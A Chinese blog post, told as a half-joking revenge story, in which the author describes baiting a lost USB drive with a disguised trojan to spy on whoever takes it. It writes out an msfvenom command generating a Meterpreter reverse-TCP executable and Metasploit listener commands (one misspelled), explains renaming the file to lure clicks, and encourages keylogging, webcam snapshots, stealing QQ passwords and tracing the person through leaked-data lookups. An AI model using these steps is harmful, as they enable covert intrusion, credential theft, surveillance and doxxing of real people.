在某一天,我不小心把U盘落在电脑室。没想到啊,竟然忘记把U盘拔出来了,结果就被哪个龟孙子给拿了。没关系,我有神器。

blob.png

是这样的,我的U盘里面有一个病毒,U盘设置了写保护,禁止删除该文件。一旦有人点击该文件,就会释放远程控制病毒。文件是这样的

blob.png

谁看到都想点一下吧?

有人就点了~~我这边也收到主机上线的通知

QQ截图20180418223343.png

呵,尼玛还用XP呢?

我做的第一件事就是看看有没有前置摄像头

blob.png

可惜没有。那就来个屏幕截图

blob.png

QQ截图20180424164721.png

竟然在刷课??看右上角是什么???

blob.png

好的,我知道了你的名字。

然后,通过一些特殊的方式,例如社工库,找到了这个人的所有信息

blob.png

于是我在QQ上联系了他

Screenshot_20180428-145107_QQ.jpg

于是我找回了我的U盘。

之前我就想到,我应该在U盘里做一些安全措施,事实证明我是对的。

我是这么做的:

1.在VPS上搭建一个ngrok服务器,做内网穿透和端口转发。搭建方法请百度。

2.启动metasploit,利用msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地监听端口 -f exe > shell.exe

木马名字改成那种让别人一眼看到就想点的名字。小偷正在翻你的文件,突然眼前一亮

QQ截图20180418223258_副本.png

嗯?

blob.png

3.设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exploit。

use exploit/multi/handler
set payloads windows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit

4.对方一旦打开这个病毒,电脑就被你控制了。用sysinfo查看对方系统信息,keyscan_start启动键盘记录器,screenshot屏幕截图,webcam_snap启动远程摄像头拍照......

具体命令如下

QQ截图20180418223538.png

QQ截图20180418223619.pngQQ截图20180418224147.png

什么功能都有,自行发挥吧。把他QQ密码记录下来,登他空间发说说都没问题。

别问为什么我这么牛逼,因为这都是我瞎编的。

blob.png

上面都是我YY的!!!!!!

我TM早该这么干了!!!(上面是真实的,在虚拟机里面操作的,此方法可行)

可惜啊,我两百多的U盘,我这么多PPT模板,还有那么多文件,还是U盘启动盘。还好没有重要数据。

忘记旧欢的方法,就是尽快找到新欢。

于是,我买了一个比之前更大、更快、更漂亮的U盘。

blob.png

(完)